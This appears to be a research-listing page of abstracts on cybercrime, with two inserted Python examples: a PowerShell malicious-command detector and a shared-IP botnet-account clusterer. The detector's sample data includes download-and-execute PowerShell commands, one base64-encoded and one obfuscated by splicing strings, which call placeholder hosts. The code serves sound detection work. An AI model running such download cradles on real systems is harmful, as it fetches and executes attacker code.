Cybercriminals

14,000,000 Leading Edge Experts on the ideXlab platform

Scan Science and Technology

Contact Leading Edge Experts & Companies

The Experts below are selected from a list of 3402 Experts worldwide ranked by the ideXlab platform

Giovanni Vigna - One of the best experts on this subject based on the ideXlab platform.

  • ACM Conference on Computer and Communications Security - Drops for Stuff: An Analysis of Reshipping Mule Scams
    Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015
    Co-Authors: Shuang Hao, Gianluca Stringhini, Kevin Borgolte, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni Vigna
    Abstract:

    Credit card fraud has seen a rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction is reshipping scams. In such scams, cybercriminals purchase high-value or highly demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the cybercriminals, most of whom are located overseas. Once the goods reach the cybercriminals, they are resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.

  • USENIX Security Symposium - EVILCOHORT: detecting communities of malicious accounts on online services
    2015
    Co-Authors: Gianluca Stringhini, Manuel Egele, Pierre Mourlanne, Grégoire Jacob, Christopher Kruegel, Giovanni Vigna
    Abstract:

    Cybercriminals misuse accounts on online services (e.g., webmails and online social networks) to perform malicious activity, such as spreading malicious content or stealing sensitive information. In this paper, we show that accounts that are accessed by botnets are a popular choice for cybercriminals. Since botnets are composed of a finite number of infected computers, we observe that cybercriminals tend to have their bots connect to multiple online accounts to perform malicious activity. We present EVILCOHORT, a system that detects online accounts that are accessed by a common set of infected machines. EVILCOHORT only needs the mapping between an online account and an IP address to operate, and can therefore detect malicious accounts on any online service (webmail services, online social networks, storage services) regardless of the type of malicious activity that these accounts perform. Unlike previous work, our system can identify malicious accounts that are controlled by botnets but do not post any malicious content (e.g., spam) on the service. We evaluated EVILCOHORT on multiple online services of different types (a webmail service and four online social networks), and show that it accurately identifies malicious accounts.

  • Detecting spammers on social networks
    Proceedings of the Annual Computer Security Applications Conference (ACSAC), 2010
    Co-Authors: Giovanni Vigna
    Abstract:

    Social networking has become a popular way for users to meet and interact online. Users spend a significant amount of time on popular social network platforms (such as Facebook, MySpace, or Twitter), storing and sharing a wealth of personal information. This information, as well as the possibility of contacting thousands of users, also attracts the interest of cybercriminals. For example, cybercriminals might exploit the implicit trust relationships between users in order to lure victims to malicious websites. As another example, cybercriminals might find personal information valuable for identity theft or to drive targeted spam campaigns. In this paper, we analyze to what extent spam has entered social networks. More precisely, we analyze how spammers who target social networking sites operate. To collect the data about spamming activity, we created a large and diverse set of "honey-profiles" on three large social networking sites, and logged the kind of contacts and messages that they received. We then analyzed the collected data and identified anomalous behavior of users who contacted our profiles. Based on the analysis of this behavior, we developed techniques to detect spammers in social networks, and we aggregated their messages into large spam campaigns. Our results show that it is possible to automatically identify the accounts used by spammers, and our analysis was used for take-down efforts in a real-world social network. More precisely, during this study, we collaborated with Twitter and correctly detected and deleted 15,857 spam profiles. © 2010 ACM.

Amir Rubin - One of the best experts on this subject based on the ideXlab platform.

  • AsiaCCS - Detecting Malicious PowerShell Commands using Deep Neural Networks
    Proceedings of the 2018 on Asia Conference on Computer and Communications Security - ASIACCS '18, 2018
    Co-Authors: Danny Hendler, Shay Kels, Amir Rubin
    Abstract:

    Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. Based on Microsoft's .NET framework, it includes an interface that allows programmers to access operating system services. While PowerShell can be configured by administrators for restricting access and reducing vulnerabilities, these restrictions can be bypassed. Moreover, PowerShell commands can be easily generated dynamically, executed from memory, encoded and obfuscated, thus making the logging and forensic analysis of code executed by PowerShell challenging. For all these reasons, PowerShell is increasingly used by cybercriminals as part of their attacks' tool chain, mainly for downloading malicious content and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to PowerShell's abuse by cybercriminals [52] reported on a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need to develop effective methods for detecting malicious PowerShell commands. In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). Detectors' performance was evaluated using a large real-world dataset. Our evaluation results show that, although our detectors (and especially the traditional NLP-based ones) individually yield high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier provides the best performance, since the latter classifier is able to detect malicious commands that succeed in evading the former. Our analysis of these evasive commands reveals that some obfuscation patterns automatically detected by the CNN classifier are intrinsically difficult to detect using the NLP techniques we applied. Our detectors provide high recall values while maintaining a very low false positive rate, making us cautiously optimistic that they can be of practical value.
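
The ensemble idea in the abstract above, a token-level detector that a string-splicing command evades paired with a character-level detector that sees the splicing, in working code. This is an added example, not code from Hendler, Kels and Rubin or from their evaluation: the paper trains NLP features and a character-level CNN on a large labelled corpus, whereas the two detectors below are hand-written rules that stand in for the learned models and show the same division of labour. The indicator list, the regular expressions, the threshold of two obfuscation constructs, and the sample command lines are all constructed assumptions.

```python
"""Added example, not code from the paper by Hendler, Kels and Rubin: a
token-level ("NLP-style") detector and a character-level detector for
PowerShell command lines, combined as an ensemble. The hand-written rules
stand in for the paper's learned models; indicator lists, thresholds and
sample commands are constructed for illustration."""
import base64
import re

# Tokens a keyword/NLP-style detector would weight as malicious indicators
# (constructed list; a real model learns these weights from data).
SUSPICIOUS_TOKENS = {
    "iex", "invoke-expression", "downloadstring", "downloadfile", "webclient",
    "invoke-webrequest", "frombase64string", "-encodedcommand", "-enc", "-ec",
    "-nop", "-noprofile", "hidden", "bypass",
}
# -EncodedCommand / -enc / -ec followed by a base64 blob (UTF-16LE payload).
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SPLIT = re.compile(r"[\s()\[\]{}\"'.,;|&+]+")

def normalize(cmd):
    """Undo the cheapest obfuscation layer: append the decoded -EncodedCommand
    payload so the token detector sees what will actually run."""
    m = ENCODED_ARG.search(cmd)
    if m:
        try:
            cmd = cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
        except ValueError:  # binascii.Error and UnicodeDecodeError are subclasses
            pass
    return cmd

def nlp_detector(cmd):
    """Token view: the set of suspicious tokens present after normalisation."""
    toks = {t.lower() for t in SPLIT.split(normalize(cmd)) if t}
    return toks & SUSPICIOUS_TOKENS

# Character-level obfuscation constructs that survive token-based evasion.
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")                      # 'Down'+'loadString'
TICK_IN_WORD = re.compile(r"[A-Za-z]`(?![ntr0abfv])[A-Za-z]")    # I`E`X, minus `n-style escapes
CHAR_CAST = re.compile(r"\[char\]", re.IGNORECASE)               # [char]73+[char]69+...

def char_detector(cmd, threshold=2):
    """Character view: count obfuscation constructs regardless of which words
    they break apart; flag when at least `threshold` are present."""
    score = sum(len(p.findall(cmd)) for p in (CONCAT, TICK_IN_WORD, CHAR_CAST))
    return score >= threshold

def classify(cmd):
    """Ensemble: malicious if either view fires. Returns (verdict, reasons)."""
    reasons = []
    hits = nlp_detector(cmd)
    if hits:
        reasons.append("tokens: " + ", ".join(sorted(hits)))
    if char_detector(cmd):
        reasons.append("character-level obfuscation")
    return ("malicious" if reasons else "benign"), reasons

# Constructed samples. The encoded payload is built here so the example is self-contained.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')".encode("utf-16-le")
).decode()
SAMPLES = {
    "benign_listing": r"Get-ChildItem -Path C:\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    "benign_string": 'Write-Output "Backup finished`nRotating logs"',
    "encoded_download": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD,
    # String splicing: no suspicious token survives intact, only the character view sees it.
    "spliced_download": "&('I'+'EX') (New-Object ('Net.Web'+'Client')).('Down'+'loadString')('http://198.51.100.7/p.ps1')",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        verdict, reasons = classify(cmd)
        print(f"{name:18} {verdict:9} {'; '.join(reasons)}")
```

Run it and the encoded download is caught by the token view alone (once the -enc payload is decoded), while the spliced variant yields no suspicious token at all and is caught only by the character view; neither benign line trips either detector. A deployed detector replaces the rule sets with the learned classifiers, but the split of responsibilities between the two views is the same.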

Yunqing Xia - One of the best experts on this subject based on the ideXlab platform.

  • A Probabilistic Generative Model for Mining Cybercriminal Networks from Online Social Media
    IEEE Computational Intelligence Magazine, 2014
    Co-Authors: Raymond Y. K. Lau, Yunqing Xia
    Abstract:

    There has been a rapid growth in the number of cybercrimes that cause tremendous financial loss to organizations. Recent studies reveal that cybercriminals tend to collaborate or even transact cyber-attack tools via the "dark markets" established in online social media. Accordingly, this presents unprecedented opportunities for researchers to tap into these underground cybercriminal communities to develop better insights about collaborative cybercrime activities so as to combat the ever increasing number of cybercrimes. The main contribution of this paper is the development of a novel weakly supervised cybercriminal network mining method to facilitate cybercrime forensics. In particular, the proposed method is underpinned by a probabilistic generative model enhanced by a novel context-sensitive Gibbs sampling algorithm. Evaluated on two social media corpora, our experimental results reveal that the proposed method significantly outperforms the Latent Dirichlet Allocation (LDA) based method and the Support Vector Machine (SVM) based method by 5.23% and 16.62% in terms of Area Under the ROC Curve (AUC), respectively. It also achieves performance comparable to the state-of-the-art Partially Labeled Dirichlet Allocation (PLDA) method. To the best of our knowledge, this is the first successful research applying a probabilistic generative model to mine cybercriminal networks from online social media.

Gianluca Stringhini - One of the best experts on this subject based on the ideXlab platform.

  • WWW (Companion Volume) - BABELTOWER: How Language Affects Criminal Activity in Stolen Webmail Accounts
    Companion Proceedings of The Web Conference 2018 (WWW '18), 2018
    Co-Authors: Emeric Bernard-jones, Jeremiah Onaolapo, Gianluca Stringhini
    Abstract:

    We set out to understand the effects of differing language on the ability of cybercriminals to navigate webmail accounts and locate sensitive information in them. To this end, we configured thirty Gmail honeypot accounts with English, Romanian, and Greek language settings. We populated the accounts with email messages in those languages by subscribing them to selected online newsletters. We also hid email messages about fake bank accounts in fifteen of the accounts to mimic real-world webmail users that sometimes store sensitive information in their accounts. We then leaked credentials to the honey accounts via paste sites on the Surface Web and the Dark Web, and collected data for fifteen days. Our statistical analyses on the data show that cybercriminals are more likely to discover sensitive information (bank account information) in the Greek accounts than in the remaining accounts, contrary to the expectation that Greek ought to constitute a barrier to the understanding of non-Greek visitors to the Greek accounts. We also extracted the important words among the emails that cybercriminals accessed (as an approximation of the keywords that they possibly searched for within the honey accounts), and found that financial terms featured among the top words. In summary, we show that language plays a significant role in the ability of cybercriminals to access sensitive information hidden in compromised webmail accounts.

  • Email Babel: does language affect criminal activity in compromised webmail accounts?
    arXiv: Computers and Society, 2017
    Co-Authors: Emeric Bernard-jones, Jeremiah Onaolapo, Gianluca Stringhini
    Abstract:

    We set out to understand the effects of differing language on the ability of cybercriminals to navigate webmail accounts and locate sensitive information in them. To this end, we configured thirty Gmail honeypot accounts with English, Romanian, and Greek language settings. We populated the accounts with email messages in those languages by subscribing them to selected online newsletters. We hid email messages about fake bank accounts in fifteen of the accounts to mimic real-world webmail users that sometimes store sensitive information in their accounts. We then leaked credentials to the honey accounts via paste sites on the Surface Web and the Dark Web, and collected data for fifteen days. Our statistical analyses on the data show that cybercriminals are more likely to discover sensitive information (bank account information) in the Greek accounts than in the remaining accounts, contrary to the expectation that Greek ought to constitute a barrier to the understanding of non-Greek visitors to the Greek accounts. We also extracted the important words among the emails that cybercriminals accessed (as an approximation of the keywords that they searched for within the honey accounts), and found that financial terms featured among the top words. In summary, we show that language plays a significant role in the ability of cybercriminals to access sensitive information hidden in compromised webmail accounts.

  • ACM Conference on Computer and Communications Security - Drops for Stuff: An Analysis of Reshipping Mule Scams
    Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015
    Co-Authors: Shuang Hao, Gianluca Stringhini, Kevin Borgolte, Nick Nikiforakis, Manuel Egele, Michael Eubanks, Brian Krebs, Giovanni Vigna
    Abstract:

    Credit card fraud has seen a rampant increase in the past years, as customers use credit cards and similar financial instruments frequently. Both online and brick-and-mortar outfits repeatedly fall victim to cybercriminals who siphon off credit card information in bulk. Despite the many and creative ways that attackers use to steal and trade credit card information, the stolen information can rarely be used to withdraw money directly, due to protection mechanisms such as PINs and cash advance limits. As such, cybercriminals have had to devise more advanced monetization schemes to work around the current restrictions. One monetization scheme that has been steadily gaining traction is reshipping scams. In such scams, cybercriminals purchase high-value or highly demanded products from online merchants using stolen payment instruments, and then ship the items to a credulous citizen. This person, who has been recruited by the scammer under the guise of "work-from-home" opportunities, then forwards the received products to the cybercriminals, most of whom are located overseas. Once the goods reach the cybercriminals, they are resold on the black market for an illicit profit. Due to the intricacies of this kind of scam, it is exceedingly difficult to trace, stop, and return shipments, which is why reshipping scams have become a common means for miscreants to turn stolen credit cards into cash. In this paper, we report on the first large-scale analysis of reshipping scams, based on information that we obtained from multiple reshipping scam websites. We provide insights into the underground economy behind reshipping scams, such as the relationships among the various actors involved, the market size of this kind of scam, and the associated operational churn. We find that there exist prolific reshipping scam operations, with one having shipped nearly 6,000 packages in just 9 months of operation, exceeding 7.3 million US dollars in yearly revenue, contributing to an overall reshipping scam revenue of an estimated 1.8 billion US dollars per year. Finally, we propose possible approaches to intervene and disrupt reshipping scam services.

  • USENIX Security Symposium - EVILCOHORT: detecting communities of malicious accounts on online services
    2015
    Co-Authors: Gianluca Stringhini, Manuel Egele, Pierre Mourlanne, Grégoire Jacob, Christopher Kruegel, Giovanni Vigna
    Abstract:

    Cybercriminals misuse accounts on online services (e.g., webmails and online social networks) to perform malicious activity, such as spreading malicious content or stealing sensitive information. In this paper, we show that accounts that are accessed by botnets are a popular choice for cybercriminals. Since botnets are composed of a finite number of infected computers, we observe that cybercriminals tend to have their bots connect to multiple online accounts to perform malicious activity. We present EVILCOHORT, a system that detects online accounts that are accessed by a common set of infected machines. EVILCOHORT only needs the mapping between an online account and an IP address to operate, and can therefore detect malicious accounts on any online service (webmail services, online social networks, storage services) regardless of the type of malicious activity that these accounts perform. Unlike previous work, our system can identify malicious accounts that are controlled by botnets but do not post any malicious content (e.g., spam) on the service. We evaluated EVILCOHORT on multiple online services of different types (a webmail service and four online social networks), and show that it accurately identifies malicious accounts.
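
The detection principle stated in the EVILCOHORT abstract (listed above under both Giovanni Vigna and Gianluca Stringhini), reduced to code: starting from nothing but account-to-IP login records, group the accounts that were accessed from a common set of machines. This is an added example, not the authors' system; the thresholds (at least two shared IPs to link a pair of accounts, IPs serving more than 100 accounts ignored), the grouping by connected component, and the login records are constructed assumptions.

```python
"""Added example, not code from the EVILCOHORT paper or its authors: a minimal
implementation of the paper's core observation. Given only (account, source IP)
login records, link accounts that were accessed from the same IPs and report
the connected groups. A handful of bots driving many accounts leaves each pair
of those accounts sharing several IPs, while two ordinary users behind one NAT
share just that one address. Thresholds and records are constructed assumptions."""
from collections import defaultdict
from itertools import combinations

# Constructed sample of (account, client_ip) pairs as a service would log them.
LOGINS = [
    ("alice", "203.0.113.5"), ("alice", "203.0.113.5"),
    ("bob", "198.51.100.7"), ("bob", "198.51.100.8"),
    # three accounts each accessed from the same small pool of infected hosts
    ("bot_a", "192.0.2.10"), ("bot_a", "192.0.2.11"), ("bot_a", "192.0.2.12"),
    ("bot_b", "192.0.2.10"), ("bot_b", "192.0.2.11"), ("bot_b", "192.0.2.12"),
    ("bot_c", "192.0.2.10"), ("bot_c", "192.0.2.11"), ("bot_c", "192.0.2.13"),
    # three unrelated users behind one office NAT: a single shared IP is not evidence
    ("carol", "203.0.113.99"), ("dave", "203.0.113.99"), ("erin", "203.0.113.99"),
]

def accounts_by_ip(logins, max_accounts_per_ip=100):
    """Invert the log into IP -> set of accounts. IPs seen with more than
    `max_accounts_per_ip` accounts (carrier-grade NAT, large proxies) are
    dropped: they would link everyone to everyone and carry no signal."""
    by_ip = defaultdict(set)
    for account, ip in logins:
        by_ip[ip].add(account)
    return {ip: accs for ip, accs in by_ip.items() if len(accs) <= max_accounts_per_ip}

def shared_ip_graph(by_ip, min_shared=2):
    """Account graph: an edge joins two accounts accessed from at least
    `min_shared` common IPs. Counting per IP keeps the work proportional to
    the co-accessing pairs rather than to all pairs of accounts."""
    shared = defaultdict(int)  # (a, b) -> number of IPs both were accessed from
    for accounts in by_ip.values():
        for a, b in combinations(sorted(accounts), 2):
            shared[(a, b)] += 1
    adjacency = defaultdict(set)
    for (a, b), n in shared.items():
        if n >= min_shared:
            adjacency[a].add(b)
            adjacency[b].add(a)
    return adjacency

def cohorts(adjacency, min_size=2):
    """Connected components of the shared-IP graph, each a candidate set of
    accounts driven by the same infected machines."""
    seen, found = set(), []
    for start in sorted(adjacency):
        if start in seen:
            continue
        component, stack = set(), [start]
        while stack:
            node = stack.pop()
            if node in component:
                continue
            component.add(node)
            stack.extend(adjacency[node] - component)
        seen |= component
        if len(component) >= min_size:
            found.append(sorted(component))
    return found

def find_evil_cohorts(logins, min_shared=2, min_size=2):
    """End-to-end: login records in, lists of suspicious account groups out."""
    return cohorts(shared_ip_graph(accounts_by_ip(logins), min_shared), min_size)

if __name__ == "__main__":
    for cohort in find_evil_cohorts(LOGINS):
        print("accounts sharing infected hosts:", ", ".join(cohort))
```

The min_shared threshold is what separates a botnet cohort from people behind one NAT: carol, dave and erin share a single address and are never linked, while the bot_* accounts share two or three addresses and form one component. Lowering min_shared to 1 links the NAT users as well, which is the false-positive mode to watch for on a real service; raising it to 3 keeps only the pair that shares the full pool.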

Jonathan Lusthaus - One of the best experts on this subject based on the ideXlab platform.

  • Honour Among (Cyber)thieves
    European Journal of Sociology, 2018
    Co-Authors: Jonathan Lusthaus
    Abstract:

    It is well known that criminals, who operate outside the law and the protection of the state, face difficulties in cooperating due both to the requirement of secrecy and a deficit of trust. For cybercriminals the anonymity of the Internet creates further challenges, making it even more difficult to assess trustworthiness and enforce agreements. Yet, contrary to expectations, collaboration among cybercriminals is prevalent, and a sophisticated industry has emerged. The purpose of this paper is to address this puzzle in relation to profit-driven cybercrime. It draws on a collection of interviews with former cybercriminals that provide a valuable form of data on micro-level and often secretive interactions. It examines four key mechanisms that lead to improved cooperation: reputation, appearance, performance and enforcement. It also addresses the rarely discussed, and somewhat counterintuitive, role that offline interactions may play in enhancing collective action among cybercriminals.

  • Cybercrime: the industry of anonymity
    2016
    Co-Authors: Jonathan Lusthaus
    Abstract:

    The central theme of this thesis is that cybercrime has matured into a large profit-driven industry. Hobby hackers still exist and hacktivists have attracted some attention in recent years, but a very significant component of contemporary cybercrime is now financially motivated. While its goods and services are usually illicit, the cybercrime industry operates according to the same broad principles of industrial organisation observed across numerous other contexts. But the development of this industry is somewhat puzzling. Ostensibly much cybercriminal cooperation takes place online. As a result, cybercriminals are often partnering with online criminals whose true identities are unknown to them. They also have no means of physical enforcement should deals go awry. Partnering with conventional criminals, who operate outside the protection of the state, already appears to present significant challenges for cooperation. The challenge of anonymity makes cooperation even more difficult and suggests that cybercriminals would often act alone, or in small groups. Instead a large successful industry has formed. This thesis first addresses the industrialisation of cybercrime. It then addresses this puzzle of how cybercriminals have overcome the challenges to cooperation to build an industry on such a scale.

  • How Organised Is Organised Cybercrime?
    Global Crime, 2013
    Co-Authors: Jonathan Lusthaus
    Abstract:

    To some writers and commentators, fully fledged organised cybercrime is currently emerging. Law enforcement spokesmen and Internet security firms have even made comparisons between the structure of cybercriminal enterprises and organisations like La Cosa Nostra. But, in reality, conventional criminal labels applied to cybercrime are themselves often poorly understood by those who employ them. The purpose of this research note is to apply scholarly rigor to the question of whether profit-driven cybercrime can fit underneath formal definitions of organised crime and mafias. It proceeds in three sections: the first section outlines academic definitions of organised crime, mafias and cybercrime; the second section assesses whether online cybercriminal trading forums, perhaps the most visible and documented examples of cybercriminal organisation, might constitute mafias as some contend; the third section briefly discusses some other less documented examples of ‘organised’ cybercrime and assesses the broader possibility of online groups being classified as organised crime groups.

  • Trust in the World of Cybercrime
    Global Crime, 2012
    Co-Authors: Jonathan Lusthaus
    Abstract:

    For cybercriminals, the anonymity of the Internet offers not only opportunities but also challenges. Where one does not truly know whom one is doing business with, it is difficult to assess trustworthiness or to retaliate should dealings go sour and agreements need to be enforced. This creates a large deficit of trust, beyond even that common among conventional criminals, and makes cybercriminal transactions very unstable. As a result, it might be expected that cybercriminals would often act alone. But, in reality, cybercriminals collaborate quite widely. This is the puzzle that this article addresses. In order to overcome the major challenges of online anonymity, and to capitalise on its benefits, cybercriminals have developed a range of mechanisms that buttress trust. These include mechanisms relating to (1) establishing cybercriminal identities; (2) assessing cybercriminal attributes; and (3) extra-legal governance.